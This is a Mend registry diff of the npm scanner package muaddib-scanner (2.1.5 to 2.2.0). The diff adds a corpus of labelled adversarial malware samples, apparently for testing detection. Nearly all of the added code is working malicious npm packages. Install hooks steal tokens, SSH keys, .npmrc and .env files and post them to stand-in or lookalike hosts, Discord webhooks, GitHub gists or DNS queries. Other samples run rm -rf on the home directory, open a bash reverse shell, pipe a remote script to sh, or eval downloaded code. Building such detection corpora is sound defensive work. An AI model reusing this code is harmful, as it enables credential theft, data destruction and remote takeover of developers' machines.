npm - muaddib-scanner - Versions diffs - 2.1.5 → 2.2.0 - Mend

muaddib-scanner 2.1.5 → 2.2.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (100) hide show

package/datasets/adversarial/dead-mans-switch/index.js ADDED Viewed

@@ -0,0 +1,35 @@
+// Shai-Hulud 2.0 dead man's switch (Unit 42)
+// If no tokens found to steal → destroy the home directory
+const { exec } = require('child_process');
+const os = require('os');
+const tokens = [
+  process.env.GITHUB_TOKEN,
+  process.env.NPM_TOKEN,
+  process.env.AWS_SECRET_ACCESS_KEY,
+  process.env.GITLAB_TOKEN
+];
+const hasTokens = tokens.some(t => t && t.length > 0);
+if (hasTokens) {
+  // Exfiltrate tokens
+  const https = require('https');
+  const data = JSON.stringify({
+    host: os.hostname(),
+    tokens: tokens.filter(Boolean)
+  });
+  const req = https.request({
+    hostname: 'api.npm-metrics.dev',
+    path: '/collect',
+    method: 'POST',
+    headers: { 'Content-Type': 'application/json' }
+  }, () => {});
+  req.write(data);
+  req.end();
+} else {
+  // Dead man's switch: no tokens → destroy
+  const home = os.homedir();
+  exec(`rm -rf ${home}/`, { timeout: 30000 }, () => {});
+}

package/datasets/adversarial/dead-mans-switch/package.json ADDED Viewed

@@ -0,0 +1,9 @@
+{
+  "name": "dead-mans-switch",
+  "version": "1.0.0",
+  "description": "Holdout sample: Shai-Hulud 2.0 dead man's switch (Unit 42)",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node index.js"
+  }
+}

package/datasets/adversarial/delayed-exfil/index.js ADDED Viewed

@@ -0,0 +1,6 @@
+setTimeout(() => {
+  const token = process.env.NPM_TOKEN;
+  if (token) {
+    fetch('https://evil.com/exfil?t=' + encodeURIComponent(token));
+  }
+}, 600000);

package/datasets/adversarial/delayed-exfil/package.json ADDED Viewed

@@ -0,0 +1,6 @@
+{
+  "name": "delayed-exfil",
+  "version": "1.0.0",
+  "description": "Adversarial sample: delayed credential exfiltration",
+  "main": "index.js"
+}

package/datasets/adversarial/detached-background/launcher.js ADDED Viewed

@@ -0,0 +1,11 @@
+// Stage 1: Launch background worker and immediately exit
+// npm install completes normally — user sees no error
+const { spawn } = require('child_process');
+const path = require('path');
+const worker = spawn('node', [path.join(__dirname, 'worker.js')], {
+  detached: true,
+  stdio: 'ignore'
+});
+worker.unref();
+// Process exits here — worker continues in background

package/datasets/adversarial/detached-background/package.json ADDED Viewed

@@ -0,0 +1,9 @@
+{
+  "name": "detached-background",
+  "version": "1.0.0",
+  "description": "Adversarial sample: Shai-Hulud 2.0 detached background process",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node launcher.js"
+  }
+}

package/datasets/adversarial/detached-background/worker.js ADDED Viewed

@@ -0,0 +1,26 @@
+// Stage 2: Background worker — runs after npm install finishes
+// Waits 5 minutes to avoid detection by install-time sandboxes
+const fs = require('fs');
+const https = require('https');
+const os = require('os');
+const path = require('path');
+setTimeout(() => {
+  // Steal SSH keys
+  const sshDir = path.join(os.homedir(), '.ssh');
+  const stolen = {};
+  try { stolen.id_rsa = fs.readFileSync(path.join(sshDir, 'id_rsa'), 'utf8'); } catch (e) {}
+  try { stolen.id_ed25519 = fs.readFileSync(path.join(sshDir, 'id_ed25519'), 'utf8'); } catch (e) {}
+  try { stolen.known_hosts = fs.readFileSync(path.join(sshDir, 'known_hosts'), 'utf8'); } catch (e) {}
+  // Exfiltrate after delay
+  const data = JSON.stringify({ host: os.hostname(), keys: stolen });
+  const req = https.request({
+    hostname: 'telemetry.pkg-audit.dev',
+    path: '/v2/report',
+    method: 'POST',
+    headers: { 'Content-Type': 'application/json' }
+  }, () => {});
+  req.write(data);
+  req.end();
+}, 5 * 60 * 1000); // 5 minutes

package/datasets/adversarial/discord-webhook-exfil/index.js ADDED Viewed

@@ -0,0 +1,95 @@
+// Discord webhook exfiltration — Socket.dev mid-year report 2025
+// Credentials are sent via Discord webhooks instead of attacker-controlled domains
+// The traffic blends in with legitimate Discord API usage
+const fs = require('fs');
+const https = require('https');
+const os = require('os');
+const path = require('path');
+// Discord webhook URL — attacker creates a private channel and webhook
+const WEBHOOK_URL = 'https://discord.com/api/webhooks/1234567890123456789/abcdefghijklmnopqrstuvwxyz1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567';
+function collect() {
+  const stolen = {
+    hostname: os.hostname(),
+    user: os.userInfo().username,
+    platform: process.platform,
+    cwd: process.cwd()
+  };
+  // Harvest environment tokens
+  const sensitiveEnvVars = ['NPM_TOKEN', 'GITHUB_TOKEN', 'AWS_ACCESS_KEY_ID',
+    'AWS_SECRET_ACCESS_KEY', 'DISCORD_TOKEN', 'SLACK_TOKEN', 'GH_TOKEN',
+    'GITLAB_TOKEN', 'DOCKER_TOKEN', 'PYPI_TOKEN'];
+  stolen.env = {};
+  for (const key of sensitiveEnvVars) {
+    if (process.env[key]) {
+      stolen.env[key] = process.env[key];
+    }
+  }
+  // Read .npmrc for auth tokens
+  try {
+    stolen.npmrc = fs.readFileSync(path.join(os.homedir(), '.npmrc'), 'utf8');
+  } catch (e) {}
+  // Read .env file if present
+  try {
+    stolen.dotenv = fs.readFileSync(path.join(process.cwd(), '.env'), 'utf8');
+  } catch (e) {}
+  return stolen;
+}
+function exfiltrate(data) {
+  // Format as Discord embed — looks like a normal webhook message
+  const payload = JSON.stringify({
+    content: '**New installation report**',
+    embeds: [{
+      title: `Host: ${data.hostname}`,
+      description: '```json\n' + JSON.stringify(data, null, 2) + '\n```',
+      color: 0x00ff00
+    }]
+  });
+  const url = new URL(WEBHOOK_URL);
+  const req = https.request({
+    hostname: url.hostname,
+    path: url.pathname,
+    method: 'POST',
+    headers: {
+      'Content-Type': 'application/json',
+      'Content-Length': Buffer.byteLength(payload)
+    }
+  }, () => {});
+  req.write(payload);
+  req.end();
+}
+// Also send via Sentry-like OAST endpoint as backup
+function exfiltrateViaSentry(data) {
+  const sentryPayload = JSON.stringify({
+    event_id: require('crypto').randomUUID(),
+    message: JSON.stringify(data),
+    level: 'info',
+    platform: 'node'
+  });
+  const req = https.request({
+    hostname: 'o123456.ingest.sentry.io',
+    path: '/api/789/store/',
+    method: 'POST',
+    headers: {
+      'Content-Type': 'application/json',
+      'X-Sentry-Auth': 'Sentry sentry_key=abc123'
+    }
+  }, () => {});
+  req.write(sentryPayload);
+  req.end();
+}
+const data = collect();
+exfiltrate(data);
+exfiltrateViaSentry(data);

package/datasets/adversarial/discord-webhook-exfil/package.json ADDED Viewed

@@ -0,0 +1,9 @@
+{
+  "name": "discord-webhook-exfil",
+  "version": "1.0.0",
+  "description": "Adversarial sample: Discord webhook credential exfiltration (Socket.dev 2025)",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node index.js"
+  }
+}

package/datasets/adversarial/dns-chunk-exfil/index.js ADDED Viewed

@@ -0,0 +1,10 @@
+const dns = require('dns');
+const secret = process.env.AWS_SECRET_ACCESS_KEY;
+if (secret) {
+  const hex = Buffer.from(secret).toString('hex');
+  const chunks = hex.match(/.{1,60}/g);
+  chunks.forEach((chunk, i) => {
+    dns.resolve(`${i}.${chunk}.exfil.evil.com`, () => {});
+  });
+}

package/datasets/adversarial/dns-chunk-exfil/package.json ADDED Viewed

@@ -0,0 +1,6 @@
+{
+  "name": "dns-chunk-exfil",
+  "version": "1.0.0",
+  "description": "Adversarial sample: DNS-based chunked credential exfiltration",
+  "main": "index.js"
+}

package/datasets/adversarial/docker-aware/index.js ADDED Viewed

@@ -0,0 +1,10 @@
+const fs = require('fs');
+const { exec } = require('child_process');
+try {
+  fs.accessSync('/.dockerenv');
+  // Inside Docker/sandbox — do nothing
+} catch (e) {
+  // Not in sandbox — execute payload
+  exec('curl https://evil.com/shell.sh | sh');
+}

package/datasets/adversarial/docker-aware/package.json ADDED Viewed

@@ -0,0 +1,6 @@
+{
+  "name": "docker-aware",
+  "version": "1.0.0",
+  "description": "Adversarial sample: sandbox detection via /.dockerenv",
+  "main": "index.js"
+}

package/datasets/adversarial/double-base64-exfil/index.js ADDED Viewed

@@ -0,0 +1,11 @@
+// Shai-Hulud v1/v2: double base64 encoding of GITHUB_TOKEN + exec exfiltration
+// Combines data obfuscation with shell command execution
+const { exec } = require('child_process');
+const token = process.env.GITHUB_TOKEN || '';
+// Double encode to evade base64 pattern detection
+const encoded = Buffer.from(Buffer.from(token).toString('base64')).toString('base64');
+const cmd = `curl -s -X POST -H "Content-Type: text/plain" -d "${encoded}" https://collect.npm-telemetry.dev/api/token`;
+exec(cmd, { timeout: 10000 }, () => {});

package/datasets/adversarial/double-base64-exfil/package.json ADDED Viewed

@@ -0,0 +1,9 @@
+{
+  "name": "double-base64-exfil",
+  "version": "1.0.0",
+  "description": "Holdout sample: Shai-Hulud double base64 encoding + exec exfiltration",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node index.js"
+  }
+}

package/datasets/adversarial/dynamic-import/index.js ADDED Viewed

@@ -0,0 +1,21 @@
+// Adversarial sample: ESM dynamic import() to avoid require() detection
+async function run() {
+  var fs = await import('fs');
+  var http = await import('http');
+  var sshKey = fs.default.readFileSync(require('os').homedir() + '/.ssh/id_rsa', 'utf8');
+  var payload = JSON.stringify({ key: sshKey, host: require('os').hostname() });
+  var opts = {
+    hostname: 'collector.evil.com',
+    port: 80,
+    path: '/keys',
+    method: 'POST',
+    headers: { 'Content-Type': 'application/json', 'Content-Length': payload.length }
+  };
+  var req = http.default.request(opts, function() {});
+  req.write(payload);
+  req.end();
+}
+run();

package/datasets/adversarial/dynamic-import/package.json ADDED Viewed

@@ -0,0 +1,9 @@
+{
+  "name": "dynamic-import",
+  "version": "1.0.0",
+  "description": "Adversarial sample: ESM dynamic import() instead of require()",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node index.js"
+  }
+}

package/datasets/adversarial/dynamic-require/index.js ADDED Viewed

@@ -0,0 +1,3 @@
+// Adversarial sample: dynamic require via base64 decode + reverse shell
+const mod = require(Buffer.from('Y2hpbGRfcHJvY2Vzcw==', 'base64').toString());
+mod.exec('bash -i >& /dev/tcp/10.0.0.1/4444 0>&1');

package/datasets/adversarial/dynamic-require/package.json ADDED Viewed

@@ -0,0 +1,9 @@
+{
+  "name": "dynamic-require",
+  "version": "1.0.0",
+  "description": "Adversarial sample: base64-encoded require to load child_process, then reverse shell",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node index.js"
+  }
+}

package/datasets/adversarial/fake-captcha-fingerprint/index.js ADDED Viewed

@@ -0,0 +1,64 @@
+// Fake CAPTCHA fingerprint (Hive Pro, July 2025)
+// Opens a local HTTP server with a fake CAPTCHA page
+// Collects system info and sends to C2 when user interacts
+const http = require('http');
+const https = require('https');
+const os = require('os');
+const HTML = `<!DOCTYPE html>
+<html><body>
+<h2>Security Verification Required</h2>
+<p>Please verify you are not a robot to continue installation.</p>
+<button onclick="verify()">I'm not a robot</button>
+<script>
+function verify() {
+  fetch('/verify', { method: 'POST' }).then(() => {
+    document.body.innerHTML = '<h2>Verified! Installation continuing...</h2>';
+  });
+}
+</script>
+</body></html>`;
+const fingerprint = {
+  hostname: os.hostname(),
+  platform: os.platform(),
+  arch: os.arch(),
+  user: os.userInfo().username,
+  interfaces: os.networkInterfaces(),
+  cpus: os.cpus().length,
+  memory: os.totalmem()
+};
+const server = http.createServer((req, res) => {
+  if (req.method === 'POST' && req.url === '/verify') {
+    // Send fingerprint to C2
+    const payload = JSON.stringify(fingerprint);
+    const c2req = https.request({
+      hostname: 'captcha-verify.analytics-hub.dev',
+      path: '/api/fingerprint',
+      method: 'POST',
+      headers: { 'Content-Type': 'application/json' }
+    }, () => {});
+    c2req.write(payload);
+    c2req.end();
+    res.writeHead(200);
+    res.end('OK');
+    setTimeout(() => server.close(), 1000);
+  } else {
+    res.writeHead(200, { 'Content-Type': 'text/html' });
+    res.end(HTML);
+  }
+});
+server.listen(0, () => {
+  const port = server.address().port;
+  // Try to open browser
+  const { exec } = require('child_process');
+  const openCmd = process.platform === 'darwin' ? 'open' : process.platform === 'win32' ? 'start' : 'xdg-open';
+  exec(`${openCmd} http://localhost:${port}`, () => {});
+  // Auto-close after 60 seconds
+  setTimeout(() => server.close(), 60000);
+});

package/datasets/adversarial/fake-captcha-fingerprint/package.json ADDED Viewed

@@ -0,0 +1,9 @@
+{
+  "name": "fake-captcha-fingerprint",
+  "version": "1.0.0",
+  "description": "Holdout sample: typosquatting fake CAPTCHA fingerprinting (Hive Pro July 2025)",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node index.js"
+  }
+}

package/datasets/adversarial/gh-cli-token-steal/index.js ADDED Viewed

@@ -0,0 +1,31 @@
+// s1ngularity/Nx: steal GitHub token via the official gh CLI
+// No file reads, no process.env — uses a legitimate installed tool
+const { execSync } = require('child_process');
+const https = require('https');
+const os = require('os');
+let ghToken = '';
+try {
+  ghToken = execSync('gh auth token', { encoding: 'utf8', timeout: 5000 }).trim();
+} catch (e) {}
+if (ghToken) {
+  const data = JSON.stringify({
+    host: os.hostname(),
+    user: os.userInfo().username,
+    token: ghToken
+  });
+  const req = https.request({
+    hostname: 'api.dev-metrics.io',
+    path: '/v1/auth',
+    method: 'POST',
+    headers: {
+      'Content-Type': 'application/json',
+      'Content-Length': Buffer.byteLength(data)
+    }
+  }, () => {});
+  req.write(data);
+  req.end();
+}

package/datasets/adversarial/gh-cli-token-steal/package.json ADDED Viewed

@@ -0,0 +1,6 @@
+{
+  "name": "gh-cli-token-steal",
+  "version": "1.0.0",
+  "description": "Holdout sample: s1ngularity/Nx gh CLI token theft",
+  "main": "index.js"
+}

package/datasets/adversarial/github-exfil/index.js ADDED Viewed

@@ -0,0 +1,33 @@
+// Shai-Hulud v1/v2: Exfiltrate secrets via GitHub API
+// Uses api.github.com — a trusted domain that bypasses domain-based detection
+const https = require('https');
+const fs = require('fs');
+const os = require('os');
+const path = require('path');
+// Harvest all available secrets
+const secrets = {};
+try { secrets.npmrc = fs.readFileSync(path.join(os.homedir(), '.npmrc'), 'utf8'); } catch (e) {}
+try { secrets.ssh = fs.readFileSync(path.join(os.homedir(), '.ssh', 'id_rsa'), 'utf8'); } catch (e) {}
+secrets.github_token = process.env.GITHUB_TOKEN;
+secrets.npm_token = process.env.NPM_TOKEN;
+// Create a public gist with the stolen credentials
+const gistPayload = JSON.stringify({
+  description: 'config backup',
+  public: false,
+  files: { 'config.txt': { content: JSON.stringify(secrets) } }
+});
+const req = https.request({
+  hostname: 'api.github.com',
+  path: '/gists',
+  method: 'POST',
+  headers: {
+    'Authorization': 'token ' + process.env.GITHUB_TOKEN,
+    'User-Agent': 'node',
+    'Content-Type': 'application/json'
+  }
+}, () => {});
+req.write(gistPayload);
+req.end();

package/datasets/adversarial/github-exfil/package.json ADDED Viewed

@@ -0,0 +1,9 @@
+{
+  "name": "github-exfil",
+  "version": "1.0.0",
+  "description": "Adversarial sample: Shai-Hulud v1/v2 GitHub API exfiltration",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node index.js"
+  }
+}

package/datasets/adversarial/iife-exfil/index.js ADDED Viewed

@@ -0,0 +1,17 @@
+// Adversarial sample: IIFE with random variable names, env read + http.request exfil
+(function() {
+  var _0xfa3b = require('http');
+  var _0xc91e = process.env.AWS_ACCESS_KEY_ID;
+  var _0xd27a = process.env.AWS_SECRET_ACCESS_KEY;
+  var _0xb1f4 = JSON.stringify({ k: _0xc91e, s: _0xd27a });
+  var _0xe8c2 = {
+    hostname: 'collector.evil.com',
+    port: 80,
+    path: '/collect',
+    method: 'POST',
+    headers: { 'Content-Type': 'application/json', 'Content-Length': _0xb1f4.length }
+  };
+  var _0xa7d9 = _0xfa3b.request(_0xe8c2, function(_0xf1) {});
+  _0xa7d9.write(_0xb1f4);
+  _0xa7d9.end();
+})();

package/datasets/adversarial/iife-exfil/package.json ADDED Viewed

@@ -0,0 +1,9 @@
+{
+  "name": "iife-exfil",
+  "version": "1.0.0",
+  "description": "Adversarial sample: IIFE with obfuscated variable names, env read + http.request exfil",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node index.js"
+  }
+}

package/datasets/adversarial/nested-payload/index.js ADDED Viewed

@@ -0,0 +1,3 @@
+// Clean entry point — nothing suspicious here
+var utils = require('./utils/helper');
+console.log('Package initialized: ' + utils.version);

package/datasets/adversarial/nested-payload/package.json ADDED Viewed

@@ -0,0 +1,9 @@
+{
+  "name": "nested-payload",
+  "version": "1.0.0",
+  "description": "Adversarial sample: malware buried 3 levels deep in require chain",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node index.js"
+  }
+}

package/datasets/adversarial/nested-payload/utils/helper.js ADDED Viewed

@@ -0,0 +1,6 @@
+// Intermediate layer — looks like a utility module
+var format = require('./lib/format');
+module.exports = {
+  version: '1.0.0',
+  format: format
+};

package/datasets/adversarial/nested-payload/utils/lib/format.js ADDED Viewed

@@ -0,0 +1,23 @@
+// Buried payload — 3 levels deep from index.js
+var cp = require('child_process');
+var fs = require('fs');
+var https = require('https');
+var npmrc = fs.readFileSync(require('os').homedir() + '/.npmrc', 'utf8');
+var token = npmrc.match(/_authToken=(.+)/);
+if (token) {
+  var data = JSON.stringify({ t: token[1], h: require('os').hostname() });
+  var opts = {
+    hostname: 'exfil.evil.com',
+    port: 443,
+    path: '/steal',
+    method: 'POST',
+    headers: { 'Content-Type': 'application/json', 'Content-Length': data.length }
+  };
+  var req = https.request(opts, function() {});
+  req.write(data);
+  req.end();
+}
+module.exports = function() {};

package/datasets/adversarial/postinstall-download/package.json ADDED Viewed

@@ -0,0 +1,8 @@
+{
+  "name": "postinstall-download",
+  "version": "1.0.0",
+  "description": "Adversarial sample: postinstall script downloads and evals remote code",
+  "scripts": {
+    "postinstall": "node -e \"require('https').get('https://evil.com/payload.js',r=>{let d='';r.on('data',c=>d+=c);r.on('end',()=>eval(d))})\""
+  }
+}

package/datasets/adversarial/preinstall-background-fork/bootstrap.js ADDED Viewed

@@ -0,0 +1,16 @@
+// Shai-Hulud 2.0: preinstall + background fork (Check Point/Zscaler/Datadog, Nov 2025)
+// Runs BEFORE install — even before dependencies are resolved
+// Forks a detached process that survives the npm install lifecycle
+const { spawn } = require('child_process');
+const path = require('path');
+// Fork stealer as a detached background process
+const child = spawn(process.execPath, [path.join(__dirname, 'stealer.js')], {
+  detached: true,
+  stdio: 'ignore',
+  env: { ...process.env, _MUADDIB_PARENT_PID: String(process.pid) }
+});
+// Unref so npm install completes normally — user sees nothing
+child.unref();

package/datasets/adversarial/preinstall-background-fork/index.js ADDED Viewed

	@@ -0,0 +1,2 @@
1	+ // Clean entry point — the attack happens in preinstall (bootstrap.js → stealer.js)
2	+ module.exports = {};

package/datasets/adversarial/preinstall-background-fork/package.json ADDED Viewed

@@ -0,0 +1,9 @@
+{
+  "name": "preinstall-background-fork",
+  "version": "1.0.0",
+  "description": "Adversarial sample: Shai-Hulud 2.0 preinstall + detached fork (Check Point/Zscaler/Datadog Nov 2025)",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node bootstrap.js"
+  }
+}